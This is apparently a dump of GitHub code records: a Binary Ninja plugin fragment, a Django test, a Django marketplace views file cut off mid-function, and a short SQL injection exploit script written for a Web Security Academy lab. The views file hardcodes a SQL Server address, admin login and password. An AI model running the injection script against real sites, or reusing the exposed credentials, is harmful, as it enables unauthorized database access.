Symbol(SymbolType.DataSymbol, address,\n f\"data_{hex(address)[2:]}\"), None\n )\n else:\n # not hidden, add a label with words, note that\n # the types are not specified, a lot of them are defined\n # in the ``make_yolo_library()`` calls in ``pd_magic`` tho\n bv.define_user_symbol(\n Symbol(SymbolType.DataSymbol, address, f.name))\n\n log_info(f\"Added {len(funcs)} labels from Symbols.db\")\n bv.commit_undo_actions()\n\n\ndef import_sdk_header(bv: BinaryView):\n \"\"\"Imports the types from the C_API header into\n the current binary view\n\n Parameters\n ----------\n bv : BinaryView\n bv to load the types into\n \"\"\"\n pd_sdk = get_sdk_root()\n if not pd_sdk:\n log_info(\"Failed to provide SDK path\")\n return\n\n # import the header file for the playdate SDK\n with open(str(pd_sdk.header_path), \"r\") as f:\n flags = PD_HEADER_FLAGS[\"flags\"]\n include_path = [str(pd_sdk.root / \"C_API\")]\n sys_include_path = get_system_headers()\n defines = PD_HEADER_FLAGS[\"defines\"]\n\n parsed = TypeParser.default.parse_types_from_source(\n f.read(),\n pd_sdk.header_path.name,\n bv.platform,\n None,\n flags + defines,\n include_path + sys_include_path)\n\n types = parsed[0].types\n functions = parsed[0].functions\n\n if parsed is None:\n log_error(\"Failed parsing header file\")\n return\n\n # add the functions and types so we can actually use them\n for t in types:\n bv.define_user_type(t.name, t.type)\n\n for f in functions:\n bv.define_user_type(f.name, f.type)\n\n log_info(\n f\"pd-ninja Loaded {len(types)} types, {len(functions)} functions.\")\n\n # add the stablized types\n make_stable_library(bv)\n\n\ndef add_platform_symbols(bv: BinaryView):\n \"\"\"Adds platform symbols to the binaryview\n\n Parameters\n ----------\n bv : BinaryView\n bv to modify\n \"\"\"\n # if we have a dump that contains the kernel + bootlaoder, tag the IVT\n log_info(\"Adding IVT Table\")\n # apply IVT Type\n ivt_type = bv.get_type_by_name(\"IVT_TABLE\")\n if not ivt_type:\n log_error(\"Must add pd-ninja types first!\")\n return\n\n bv.define_user_data_var(PLAYDATE_KERNEL_START, ivt_type)\n bv.define_user_symbol(\n Symbol(SymbolType.DataSymbol,\n PLAYDATE_KERNEL_START, \"ivt_table\")\n )\n\n # the first value in the IVT is the stack pointer, not a pointer\n thumb_addr_mask = 0xFFFFFFFE # binary ninja is bad at thumb\n ivt_labels_start = PLAYDATE_KERNEL_START + 4\n ivt_labels_end = ivt_labels_start + (IVT_LEN - 4)\n for i, addr in enumerate(range(ivt_labels_start, ivt_labels_end, 4)):\n # this iterator starts from 1 idx\n name = STM32F7_IVT_NAMES[i + 1]\n value = bv.read_int(addr, 4, False) & thumb_addr_mask\n bv.define_auto_symbol(\n Symbol(SymbolType.FunctionSymbol, value, name))\n\n log_info(\"Added IVT_TABLE and created appropriate function pointers\")\n\n\ndef apply_stabilized_types(bv: BinaryView):\n \"\"\"Applies known types to known symbols. TODO\n\n Parameters\n ----------\n bv : BinaryView\n bv to modify\n \"\"\"\n\n\ndef register_plugin():\n PluginCommand.register(\"pd-ninja\\Load Symbols.db\",\n \"Load symbols.db from the SDK\",\n apply_symbols_db)\n\n PluginCommand.register(\"pd-ninja\\Import C_API/pd_api.h\",\n \"Load PD types from SDK\",\n import_sdk_header)\n PluginCommand.register(\"pd-ninja\\Add Platform Symbols\",\n \"Add symbols for the STM32F746IE\",\n add_platform_symbols)\n","repo_name":"lockbox/pd-ninja","sub_path":"pd_ninja/pd_plugin.py","file_name":"pd_plugin.py","file_ext":"py","file_size_in_byte":6642,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"69940523026","text":"import requests\nimport sys\nimport validators\n\nclass Exploit():\n def __init__(self) -> None:\n self.url = ''\n self.proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\n self.payload = {}\n self.check_args()\n self.set_url()\n self.set_payload()\n self.is_vulnerable = False\n self.check_vulnerability()\n self.is_successful = False\n \n def check_args(self) -> None:\n if len(sys.argv) < 3:\n print(f'[-] Usage: {sys.argv[0]} ')\n print(f'[-] Example: {sys.argv[0]} http://example.com \"1=1\"')\n exit()\n\n def set_url(self) -> None:\n url = sys.argv[1].strip() \n is_valid = validators.url(url)\n if not is_valid:\n print(f'[-] The URL \"{url}\" is not valid.')\n print(f'[-] Valid URL example: http://example.com')\n exit()\n\n self.url = url\n \n def set_payload(self) -> None:\n payload = sys.argv[2]\n self.payload['category'] = payload\n\n def check_vulnerability(self) -> None:\n print('[+] Checking for vulnerabiility...')\n req = requests.get(self.url, params={'category': \"'\", 'released': 1})\n if \"Internal Server Error\" in req.text:\n self.is_vulnerable = True\n\n def run(self) -> None:\n if self.is_vulnerable:\n req = requests.get(self.url, params={'category': 'Lifestyle'})\n req_payload = requests.get(self.url, params=self.payload)\n\n if len(req.text) < len(req_payload.text):\n self.is_successful = True\n\ndef main():\n exploit = Exploit()\n exploit.run()\n\n if exploit.is_successful:\n print('[+] SQL injection exploit was successful!')\n else:\n print('[-] The SQL injection exploit was not successful!') \n\nif __name__ == '__main__':\n main()","repo_name":"aeprogress/web-security-academy","sub_path":"sql-injection/lab01/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70552303185","text":"\"\"\" Tests for pipelines. \"\"\"\n\nfrom django.contrib.auth import get_user_model\nfrom django.test import TestCase\n\nfrom auth_backends.pipeline import get_user_if_exists\n\nUser = get_user_model()\n\n\nclass GetUserIfExistsPipelineTests(TestCase):\n \"\"\" Tests for the get_user_if_exists pipeline function. \"\"\"\n\n def setUp(self):\n super(GetUserIfExistsPipelineTests, self).setUp()\n self.username = 'edx'\n self.details = {'username': self.username}\n\n def test_no_user_exists(self):\n \"\"\" Verify an empty dict is returned if no user exists. \"\"\"\n actual = get_user_if_exists(None, self.details)\n self.assertDictEqual(actual, {})\n\n def test_existing_user(self):\n \"\"\" Verify a dict with the user and extra details is returned if the user exists. \"\"\"\n user = User.objects.create(username=self.username)\n actual = get_user_if_exists(None, self.details)\n self.assertDictEqual(actual, {'is_new': False, 'user': user})\n\n def test_get_user_if_exists(self):\n \"\"\" Verify only the details are returned if a user is passed to the function. \"\"\"\n user = User.objects.create(username=self.username)\n actual = get_user_if_exists(None, self.details, user=user)\n self.assertDictEqual(actual, {'is_new': False})\n","repo_name":"AlaaSwedan/edx","sub_path":"edx/app/ecommerce/venvs/ecommerce/lib/python2.7/site-packages/auth_backends/tests/test_pipeline.py","file_name":"test_pipeline.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74947793104","text":"from ast import Try\nfrom datetime import datetime\nimport operator\nfrom django.db.models.aggregates import Count\nfrom django.db.models.expressions import Exists\nfrom django.shortcuts import render\nfrom django.utils import timezone\nfrom requests import post\nfrom .models import *\nfrom django.shortcuts import render, get_object_or_404\nfrom django.contrib.auth.forms import UserCreationForm\nfrom .forms import *\nfrom django.contrib import messages\nfrom django.shortcuts import redirect\nfrom django.contrib.auth import authenticate, get_user_model\nfrom django.contrib.auth.decorators import login_required\nfrom transbank.webpay.webpay_plus.transaction import Transaction\nfrom transbank.error.transbank_error import TransbankError\nfrom django.contrib.auth import login\nfrom operator import attrgetter, itemgetter\nfrom django.core.mail import send_mail\nfrom .cart import Cart\nfrom .context_processor import cart_total_amount\nfrom django.views.decorators.csrf import csrf_protect\nfrom dash import Dash, dcc, html, Input, Output\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.template.loader import render_to_string\nfrom django_xhtml2pdf.utils import generate_pdf\nfrom django.db.models import Q\nfrom django.views.generic.base import View\nfrom wkhtmltopdf.views import PDFTemplateResponse\nimport math\nfrom django.conf import settings\nfrom django.template.loader import get_template\n\nimport os\n\nimport plotly.graph_objects as go\nimport plotly.express as px\nimport pandas as pd\nimport pyodbc\nimport json\nimport pdfkit\n\n\n\n\ndef ComprobantePDF(request,pk):\n config_path = 'C:\\\\Program Files\\\\wkhtmltopdf\\\\bin\\\\wkhtmltopdf.exe'\n config = pdfkit.configuration(wkhtmltopdf=config_path)\n \n template_path = 'my_template.html'\n template = get_template(template_path)\n \n soli = Post.objects.get(pk=pk)\n Producto = []\n subtotal=0\n for p in soli.producto.all():\n print()\n postP = Post_productos.objects.get(producto=p, post=soli)\n Producto.append([p,postP.cantidad_pujada])\n\n subtotal = subtotal + postP.cantidad_pujada*p.precio\n impuesto= subtotal*0.03\n total = subtotal+impuesto\n subtotal=str('{:,.0f}'.format(subtotal).replace(\",\", \"@\").replace(\".\", \",\").replace(\"@\", \".\"))\n impuesto=str('{:,.0f}'.format(impuesto).replace(\",\", \"@\").replace(\".\", \",\").replace(\"@\", \".\"))\n total=str('{:,.0f}'.format(total).replace(\",\", \"@\").replace(\".\", \",\").replace(\"@\", \".\"))\n \n context = {'debug': settings.DEBUG,'total':total,'impuesto':impuesto,'subtotal':subtotal,'Producto':Producto,'postP':postP,'soli':soli,}\n \n html = template.render(context)\n\n pdf = pdfkit.from_string(html, configuration = config)\n\n\n # Generate download\n pdf_path = os.path.join(settings.BASE_DIR, 'static')\n response = HttpResponse(pdf, content_type='application/pdf', )\n\n response['Content-Disposition'] = 'attachment; filename=\"resume.pdf\"'\n # print(response.status_code)\n if response.status_code != 200:\n return HttpResponse('We had some errors
' + html + '
')\n return response\n\n\n\n \n\n\n\na=1\na=1\n# Create your views here.\n\ndef index(request):\n cart = Cart(request)\n return render(request, 'index.html', {})\ndef listaContratos(request):\n cart = Cart(request)\n cont = Contrato.objects.all()\n context ={'cont':cont}\n return render(request, 'lista-contratos.html', context)\ndef gestionContratos(request):\n cart = Cart(request)\n return render(request, 'gestion-contratos.html', {})\ndef contratos(request):\n cart = Cart(request) \n if request.method == 'POST':\n form = FormContratos(request.POST)\n if form.is_valid():\n cont = form.save(commit=False)\n cont.username = form.cleaned_data['usuario']\n existeuser = get_object_or_404(User, username=cont.username)\n \n \n if Contrato.objects.filter(usuario=existeuser, vigencia=True):\n messages.error(request, f'Este usuario ya tiene un contrato vigente.')\n else: \n cont.fecha_inicio = form.cleaned_data['fecha_inicio']\n cont.fecha_termino = form.cleaned_data['fecha_termino']\n if cont.fecha_inicio > cont.fecha_termino:\n messages.error(request, f'La fecha de inicio no puede ser mayor a la de termino del contrato')\n else:\n cont.vigencia = True\n form.save()\n messages.success(request, f'Contrato para usuario {cont.username} creado')\n return redirect('contratos')\n else:\n form = FormContratos()\n context = { 'form': form }\n return render(request, 'contratos.html', context)\n\ndef register(request):\n cart = Cart(request) \n if request.method == 'POST':\n form = FormRegistroUsuario(request.POST)\n if form.is_valid():\n form = form.save(commit=False)\n if form.rol == \"6\":\n form.is_staff = True\n \n\n form.save()\n messages.success(request, f'Usuario {form.username} creado')\n return redirect('/register')\n else:\n form = FormRegistroUsuario()\n context = { 'form': form }\n return render(request, 'register.html',context)\ndef registerinterno(request):\n cart = Cart(request) \n if request.method == 'POST':\n form = FormRegistroInterno(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data['username']\n messages.success(request, f'Usuario {username} creado')\n return redirect('login')\n else:\n form = FormRegistroInterno()\n context = { 'form': form }\n return render(request, 'register-interno.html',context) \n\n\ndef seguimientoDetalle(request,pk):\n cart = Cart(request) \n solis = Posthistorico.objects.filter(idpost=pk)\n print(solis)\n context = {'solis':solis}\n return render(request, 'seguimientoDetalle.html',context)\n\n\n\n\ndef seguimiento(request,pk):\n cart = Cart(request) \n if request.user.is_staff:\n solis = Post.objects.filter(pk=pk)\n elif request.user.rol ==\"1\" or request.user.rol ==\"5\" or request.user.rol ==\"3\" or request.user.rol ==\"2\" or request.user.rol ==\"6\":\n solis = Post.objects.filter(pk=pk)\n else:\n solis = Post.objects.filter(usuario=request.user,pk=pk)\n context = {'solis':solis}\n return render(request, 'seguimiento.html',context)\n\ndef seguimientoLista(request):\n user= request.user\n cart = Cart(request)\n solis = []\n prof = []\n if request.user.is_staff:\n solis = Post.objects.all()\n elif request.user.rol ==\"5\":\n solis = Post.objects.all()\n elif request.user.rol ==\"6\":\n solis = Post.objects.all()\n elif request.user.rol ==\"1\":\n post = Post.objects.all()\n print(post)\n for p in post:\n\n for prod in p.producto.filter(autor=user):\n print(prod)\n postprod = Post_productos.objects.get(post=p, producto=prod)\n s = Post.objects.get(pk=postprod.post.pk)\n solis.append(s)\n\n\n\n elif request.user.rol ==\"2\" or request.user.rol ==\"3\":\n solis = Post.objects.filter(cliente=user)\n else:\n solis = Post.objects.filter(usuario=request.user)\n context = {'solis':solis}\n return render(request, 'seguimientoLista.html',context)\n\n\n\ndef comprobante(request,pk):\n cart = Cart(request) \n soli = Post.objects.get(pk=pk)\n soliF = Post.objects.get(pk=pk)\n Producto = []\n subtotal=0\n for p in soli.producto.all():\n print()\n postP = Post_productos.objects.get(producto=p, post=soli)\n Producto.append([p,postP.cantidad_pujada])\n\n subtotal = subtotal + postP.cantidad_pujada*p.precio \n \n subtotal = subtotal + soli.transporte.tarifa\n impuesto= subtotal*0.03\n total = subtotal+impuesto\n subtotal=str('{:,.0f}'.format(subtotal).replace(\",\", \"@\").replace(\".\", \",\").replace(\"@\", \".\"))\n impuesto=str('{:,.0f}'.format(impuesto).replace(\",\", \"@\").replace(\".\", \",\").replace(\"@\", \".\"))\n total=str('{:,.0f}'.format(total).replace(\",\", \"@\").replace(\".\", \",\").replace(\"@\", \".\"))\n \n context = {'total':total,'impuesto':impuesto,'subtotal':subtotal,'Producto':Producto,'postP':postP,'soli':soli,}\n \n \n return render(request, 'comprobante.html',context)\n\n\n\n\n\n\ndef seguimientoComprobante(request):\n user= request.user\n cart = Cart(request)\n if request.user.rol ==\"5\":\n solis = Post.objects.filter(EstadoSolicitud= '17')\n else:\n solis = Post.objects.filter(cliente=user,EstadoSolicitud= '17')\n context = {'solis':solis}\n return render(request, 'seguimientoComprobante.html',context)\n\n\napp = Dash(__name__)\n\n@app.callback(\n Output(\"graph\", \"figure\"), \n Input(\"dropdown\", \"value\"))\n\nclass DTEncoder(json.JSONEncoder):\n def default(self, obj):\n # 👇️ if passed in object is datetime object\n # convert it to a string\n if isinstance(obj, datetime):\n return str(obj)\n # 👇️ otherwise use the default behavior\n return json.JSONEncoder.default(self, obj)\n \n \n \n \n \n #langs = Fecha\n #students = usuario\n \n \n #x =langs ,\n #y = students,\n\n\n\ndef ingresarproductos(request):\n cart = Cart(request) \n if request.method == 'POST':\n form = FormProductos(request.POST, request.FILES)\n if form.is_valid():\n form = form.save(commit=False)\n form.autor = request.user\n form.save()\n messages.success(request, f'Productos agregados a tu lista de productos')\n return redirect('mis-productos')\n \n else:\n form = FormProductos()\n context = { 'form': form }\n return render(request, 'ingresar-productos.html',context)\n\n\n\n\ndef connection(request):\n s = '186.78.254.17\\DESKTOP-A7GEGG2\\SQL2019TAB,14334' #Your server name \n d = 'sqlite8' #name bd \n u = 'sa' #Your login\n p = 'Pvsa**2021' #Your login password\n cstr = 'DRIVER={ODBC Driver 17 for SQL Server};SERVER='+s+';DATABASE='+d+';UID='+u+';PWD='+ p\n conn = pyodbc.connect(cstr)\n return conn \n \n\ndef Consulta(request):\n Estado = 'Completada'\n solis = Post.objects.filter(EstadoSolicitud='17')\n if request.method == 'POST'and 'completada' in request.POST:\n solis = Post.objects.filter(EstadoSolicitud='17')\n Estado = 'Completada'\n elif request.method == 'POST'and 'nocompletada' in request.POST:\n solis = Post.objects.filter(EstadoSolicitud__in=(\"11\",\"13\"))\n Estado = 'No Completada'\n print(solis)\n Producto = []\n subtotal=0\n tarifa =0\n PostCobro =[]\n\n for soli in solis:\n for p in soli.producto.all():\n postP = Post_productos.objects.get(producto=p, post=soli)\n Producto.append([p,postP])\n subtotal = subtotal + postP.cantidad_pujada*p.precio\n PostCobro.append([str(soli.pk), postP.producto.pk,postP.producto.autor, postP.cantidad_pujada, p.precio, postP.cantidad_pujada*p.precio ,soli.transporte.tarifa,])\n if soli.transporte:\n tarifa = tarifa + soli.transporte.tarifa\n Tarifaproductos=subtotal+tarifa\n impuesto= Tarifaproductos*0.03\n Cobro = Tarifaproductos+impuesto\n subtotal=str('{:,.0f}'.format(subtotal).replace(\",\", \"@\").replace(\".\", \",\").replace(\"@\", \".\"))\n impuesto=str('{:,.0f}'.format(impuesto).replace(\",\", \"@\").replace(\".\", \",\").replace(\"@\", \".\"))\n Cobro=str('{:,.0f}'.format(Cobro).replace(\",\", \"@\").replace(\".\", \",\").replace(\"@\", \".\"))\n Tarifaproductos=str('{:,.0f}'.format(Tarifaproductos).replace(\",\", \"@\").replace(\".\", \",\").replace(\"@\", \".\"))\n\n\n DataFramePostCobro = pd.DataFrame(PostCobro,columns=['PostPK','PkProducto','Productor','CantidadPujada','PrecioProducto','PrecioProductos','TarifaTrasporte'])\n print(DataFramePostCobro)\n \n\n\n DataframePost= pd.DataFrame( DataFramePostCobro.groupby(['PostPK','TarifaTrasporte'])['PrecioProductos'].sum())\n \n DataframePost= pd.DataFrame( DataframePost.reset_index() )\n \n DataframePost= pd.DataFrame( DataFramePostCobro.groupby(['PostPK','TarifaTrasporte'])['PrecioProductos'].sum())\n \n DataframePost= pd.DataFrame( DataframePost.reset_index() )\n \n Pagatarifatrasporte=DataframePost['TarifaTrasporte'] + DataframePost['PrecioProductos']\n DataframePost.insert(3, \"Pagatarifatrasporte\", Pagatarifatrasporte, True)\n \n CobroFinal =DataframePost['Pagatarifatrasporte'] *1.03\n DataframePost.insert(4, \"CobroFinal\", CobroFinal, True)\n \n Ganacias =DataframePost['Pagatarifatrasporte'] *0.03\n DataframePost.insert(5, \"Ganacias\", Ganacias, True)\n\n print(DataframePost)\n\n '''Graficos'''\n\n\n\n figGeneral = px.bar(DataframePost, x='PostPK',y='CobroFinal', color='PostPK',\n title=\"Solicitud / Cobro Final\",\n \n )\n figGeneral.update_layout(\n title={\n 'font_size': 24,\n 'xanchor': 'center',\n 'x': 0.5\n })\n \n \n chartGeneral = figGeneral.to_html()\n\n\n\n\n figP = px.bar(DataframePost, x='PostPK',y='TarifaTrasporte', color='PostPK',\n title=\"Solicitud / Tarifa Trasporte\",\n \n )\n figP.update_layout(\n title={\n 'font_size': 24,\n 'xanchor': 'center',\n 'x': 0.5\n })\n chartP = figP.to_html()\n\n figProd = px.bar(DataframePost, x='PostPK',y='PrecioProductos', color='PostPK',\n title=\"Solicitud / Precio Productos\",\n \n )\n figProd.update_layout(\n title={\n 'font_size': 24,\n 'xanchor': 'center',\n 'x': 0.5\n })\n chartfigProd = figProd.to_html()\n \n fig = px.bar(DataframePost, x='PostPK',y='Ganacias', color='PostPK',\n title=\"Solicitud / Ganacias \",\n \n )\n fig.update_layout(\n title={\n 'font_size': 24,\n 'xanchor': 'center',\n 'x': 0.5\n })\n chart = fig.to_html()\n\n\n\n context = {'chart':chart,'chartfigProd':chartfigProd,'chartP':chartP,'chartGeneral':chartGeneral,'Tarifaproductos':Tarifaproductos,'Estado':Estado,'tarifa':tarifa,'Cobro':Cobro,'impuesto':impuesto,'subtotal':subtotal,'Producto':Producto}\n return render(request, 'Consulta.html',context)\n \n '''\n figUsuario = px.bar(DataframeConsulta, x='Transportista',\n title=\"Post/Transportista\",\n labels={'Usuario': 'Usuario', 'Fecha': 'Fecha'}, color='Transportista',\n )\n figUsuario.update_layout(\n title={\n 'font_size': 24,\n 'xanchor': 'center',\n 'x': 0.5\n })\n chartUsuario = figUsuario.to_html()\n \n \n \n df = pd.DataFrame(list(Post.objects.all().values()))\n fig = px.bar(DataframeConsulta, x='Usuario', color='Usuario',\n title=\"Post/Usuarios\",\n labels={'Usuario': 'Usuario', 'Fecha': 'Fecha'},\n )\n fig.update_layout(\n title={\n 'font_size': 24,\n 'xanchor': 'center',\n 'x': 0.5\n })\n chart = fig.to_html()\n \n \n df = px.data.tips()\n labels = GrupbyProducto.index\n values = GrupbyProducto\n figP = go.Figure(data=[go.Pie(labels=labels, values=values)])\n \n \n figP.update_layout(\n title=\"Plot Title\",\n font=dict(\n family=\"Courier New, monospace\",\n size=18,\n color=\"RebeccaPurple\"\n )\n)\n chartP = figP.to_html()\n context = { 'DataframeConsultaSumaProductortarifa':DataframeConsultaSumaProductortarifa,'DataframePost':DataframePost,'form': form ,'chart': chart,'chartP': chartP,'chartUsuario':chartUsuario,'DataframeConsultaSumaProductor':DataframeConsultaSumaProductor,'Df_grouPostIDPrecioFinalTotal':Df_grouPostIDPrecioFinalTotal,'Df_grouPostIDGananciaTotal':Df_grouPostIDGananciaTotal,'chartGeneral':chartGeneral}\n '''\n\n\n\n\n\ndef ingresarproductos(request):\n cart = Cart(request) \n if request.method == 'POST':\n form = FormProductos(request.POST, request.FILES)\n if form.is_valid():\n form = form.save(commit=False)\n form.autor = request.user\n form.save()\n messages.success(request, f'Productos agregados a tu lista de productos')\n return redirect('mis-productos')\n \n else:\n form = FormProductos()\n context = { 'form': form }\n return render(request, 'ingresar-productos.html',context)\n\nFormEstadoSolicitud\n\ndef misproductos(request):\n cart = Cart(request)\n prod = Producto.objects.filter(autor=request.user)\n context ={'prod':prod}\n return render(request, 'misproductos.html',context)\ndef venta(request):\n cart = Cart(request)\n if request.method == 'POST':\n form = FormVenta(request.POST, request.FILES)\n if form.is_valid():\n form = form.save(commit=False)\n form.usuario = request.user\n form.fecha_creacion = timezone.now()\n form.save()\n messages.success(request, f'Venta iniciada!')\n return redirect('/')\n else:\n form = FormVenta()\n context = { 'form': form }\n return render(request, 'iniciar-venta.html',context)\n\ndef pagar(request,total,pk):\n cart = Cart(request)\n total = total \n buy_order = str(pk)\n session_id = str(1)\n return_url = 'http://127.0.0.1:8000/terminar/'+str(pk)+'/'\n\n amount = total\n total= str('{:,.0f}'.format(total).replace(\",\", \"@\").replace(\".\", \",\").replace(\"@\", \".\"))\n try:\n response = Transaction().create(buy_order, session_id, amount, return_url)\n context ={'total':total,\"response\":response}\n print(amount)\n \n return render(request, 'pagar.html', context) \n except TransbankError as e:\n print(e.message)\n print(e.message)\n error =e.message\n context ={'total':total,\"error\":error,}\n return render(request, 'pagar.html', context) \n\ndef notificacion(request):\n cart = Cart(request)\n try:\n notis=Notificacion.objects.filter(usuario=request.user)\n messages.success(request, f'Tienes notificaciones de pago pendientes.')\n context={'notis':notis}\n except:\n messages.error(request, f'No tienes notificaciones actualmente.')\n context={'notis':notis}\n return render(request, 'notificacion.html',context) \n\ndef terminar(request,pk):\n cart = Cart(request)\n token = request.GET.get(\"token_ws\")\n try:\n response = Transaction().commit(token) \n soli = Post.objects.get(pk=pk)\n soli.EstadoSolicitud = \"17\"\n soli.save()\n ccorreo= soli.cliente.email\n '''send_mail(\n 'Su producto a sido completado, revise el comprobante de pago en http://127.0.0.1:8000/seguimientoComprobante/',\n 'maipo_grande@gmail.com',\n [ccorreo],\n fail_silently=False,)\n ''' \n #================COMPROBANTES DE PAGO==================\n #================PRODUCTORES==========================\n cantidadprods = len(soli.producto.all())\n cantidaddivida = soli.cantidad_actual//cantidadprods\n \n for p in soli.producto.all():\n\n postP = Post_productos.objects.get(producto=p, post=soli)\n\n comProd = Comprobante(usuario=p.autor,solicitud = soli,monto=p.precio * postP.cantidad_pujada)\n comProd.save()\n print(comProd)\n #================TRANSPORTISTA========================\n comTransp = Comprobante(usuario=soli.transporte.transportista,solicitud=soli,monto=soli.transporte.tarifa)\n comTransp.save()\n print(comTransp)\n\n messages.success(request, f'Pago realizado exitosamente.')\n return render(request, 'terminar.html',{\"token\": token,\"response\": response})\n except TransbankError as e:\n messages.error(request, f'Error en la transaccion de pago.')\n error =e.message\n print(e.message)\n print(token)\n return render(request, 'terminar.html', {\"error\":error}) \n\ndef Solicitud(request):\n cart = Cart(request)\n if request.method == 'POST':\n form = FormVenta(request.POST, request.FILES)\n if form.is_valid():\n form = form.save(commit=False)\n form.usuario = request.user\n form.fecha_creacion = timezone.now()\n \n form.save()\n messages.success(request, f'Venta iniciada!')\n return redirect('/Solicitudes')\n else:\n form = FormVenta()\n context = { 'form': form }\n return render(request, 'Solicitud.html',context)\n#SOLICITUD CLIENTES\ndef solicitudClientes(request):\n cart = Cart(request)\n if request.method == 'POST':\n form = FormVentaCliente(request.POST, request.FILES)\n if form.is_valid():\n post = form.save(commit=False)\n post.usuario = request.user\n post.fecha_creacion = timezone.now()\n post.save()\n messages.success(request, f'Solicitud enviada')\n return redirect('/Solicitudes')\n else:\n form = FormVentaCliente()\n context = { 'form': form }\n return render(request, 'solicitudClientes.html',context)\n\ndef solicitudes(request):\n cart = Cart(request)\n solis = []\n soli = Post.objects.filter(EstadoSolicitud__in=(\"3\",\"4\",\"6\",\"10\"))\n for s in soli:\n if not s.transportista:\n solis.append(s)\n\n \n context ={'solis':solis}\n return render(request, 'Solicitudes.html', context)\n\ndef solicitudesTransportista(request):\n cart = Cart(request)\n solit = Post.objects.filter(transportista=request.user,EstadoSolicitud__in=(\"10\",\"11\",\"12\",\"13\",\"15\"))\n context ={'solit':solit}\n return render(request, 'SolicitudesTransportista.html', context)\n\ndef solicitudesRevisor(request):\n cart = Cart(request)\n solir = Post.objects.filter(EstadoSolicitud__in=(\"6\",\"8\"))\n context ={'solir':solir}\n return render(request, 'solicitudesRevisor.html', context)\ndef solicitudesProductor(request):\n cart = Cart(request)\n post = Post.objects.filter(EstadoSolicitud__in=(\"1\",\"4\",\"5\"))\n solip = []\n enbodega = False\n for p in post:\n \n for prod in p.producto.filter(autor=request.user):\n post_prod = Post_productos.objects.get(post=p, producto= prod)\n enbodega=post_prod.enbodega\n \n solip = Post.objects.filter(producto=prod)\n\n\n\n context ={'solip':solip,'enbodega':enbodega}\n \n return render(request, 'solicitudesProductor.html', context)\ndef solicitudesClienteExterno(request):\n cart = Cart(request)\n soli = Post.objects.filter(cliente=request.user,EstadoSolicitud__in=(\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"10\",\"11\",\"12\",\"13\",\"14\",\"15\",\"16\"))\n\n context ={'soli':soli}\n return render(request, 'solicitudesClienteExterno.html', context)\ndef modificarSolicitud (request, pk):\n cart = Cart(request)\n SolicitudPK = Post.objects.get(pk = pk)\n if request.method == 'POST':\n form = FormSolicitudEstado(request.POST, instance = SolicitudPK)\n if form.is_valid():\n SolicitudPK = form.save(commit=False)\n SolicitudPK = Post.objects.get(pk = pk)\n\n topProductoresCProductos = []\n productoscProductor = Producto.objects.all()\n print(productoscProductor)\n \n for prod in productoscProductor:\n productorunico = User.objects.get(username=prod.autor.username,disponible=True)\n try:\n if Contrato.objects.get(usuario=productorunico,vigencia=True):\n topProductoresCProductos.append(productorunico)\n except Contrato.DoesNotExist:\n messages.error(request, f'No hay productores con contrato disponibles')\n\n \n cantidadnecesaria= SolicitudPK.cantidad_necesaria\n productonecesario = SolicitudPK.productoreq\n calibrenecesario = SolicitudPK.calibre\n variedadnecesaria = SolicitudPK.variedad\n refrigeracionnecesaria = SolicitudPK.refrigeracion\n estadoactual = form.cleaned_data['EstadoSolicitud']\n \n '''Solicitud aprobada'''\n if estadoactual == \"1\":\n topProductos = []\n topProductos1 = []\n topcaso3 = []\n \n for productor in topProductoresCProductos:\n try:\n producto1 = Producto.objects.get(autor=productor,variedad=variedadnecesaria, producto=productonecesario, calibre=calibrenecesario,Saldo=False)\n print(str(producto1.autor)+str(producto1.producto)+str(producto1.variedad))\n if not producto1 in topProductos:\n topProductos.append(producto1)\n except Producto.DoesNotExist:\n print(str(producto1)+\"califica en calibre/producto/saldo\")\n print(topProductos)\n for prodidoneo in topProductos: \n if prodidoneo.cantidad >= cantidadnecesaria:\n topProductos1.append(prodidoneo) \n else: \n topcaso3.append(prodidoneo)\n print(prodidoneo)\n\n try:\n min_precio = min(topProductos1, key=attrgetter('precio'))\n min_precio = min_precio.precio\n except:\n print(\"No hay ningun productor para calcular el precio minimo \")\n\n if not SolicitudPK.producto.exists():\n\n if any(topProductos1): \n print(len(topProductos1))\n if len(topProductos1) == 1:\n for ganador in topProductos1:\n if ganador.precio == min_precio:\n productoganador = ganador \n\n #posiblidad de bloque pl sql, cuando el producto llege a 0,borrar la fila completa del producto\n productoganador.cantidad = productoganador.cantidad - cantidadnecesaria\n productoganador.save()\n #cantidad actual ya n o seria necesaria\n SolicitudPK.cantidad_actual = cantidadnecesaria\n SolicitudPK.EstadoSolicitud = \"4\"\n SolicitudPK.producto.add(productoganador)\n\n\n postprod= Post_productos.objects.get(post=SolicitudPK, producto=productoganador)\n postprod.cantidad_pujada = cantidadnecesaria\n postprod.save()\n\n SolicitudPK.save()\n \n #ENVIAR CORREO AL PRODUCTOR PARA QUE LLEVE SUS PRODUCTOS A BODEGA\n pcorreo= productoganador.autor.email\n '''\n send_mail(\n 'PRODUCTOR!lleva tus productos a bodega central!',\n 'Tus productos ganaron la subasta, el siguiente paso es llevarlos a bodega central',\n 'maipo_grande@gmail.com',\n [pcorreo],\n fail_silently=False,\n )\n '''\n messages.success(request, f'Se ha notificado al productor para que lleve sus productos a bodega') \n #Si hay mas de un productor que califica en calibre,cantidad \n elif len(topProductos1) >= 2:\n print('========================topproductos1')\n print(topProductos1)\n #Se seleccionan los dos primeros (Top 2)\n for ganador in topProductos1[:2]:\n #si tienen el mismo precio(el minimo)\n if ganador.precio == min_precio:\n productoganador = ganador \n #Se divide la cantidad en dos\n cantidaddividida= cantidadnecesaria//2\n productoganador.cantidad = productoganador.cantidad - cantidaddividida\n productoganador.save()\n print('========================productoganador.cantidad')\n print(productoganador.cantidad)\n #se actualiza la solicitud a subasta de transporte y la cantidad actual se llena\n #SolicitudPK.cantidad_actual = SolicitudPK.cantidad_actual+cantidaddividida\n SolicitudPK.cantidad_actual = cantidadnecesaria\n SolicitudPK.EstadoSolicitud = \"4\"\n #productores 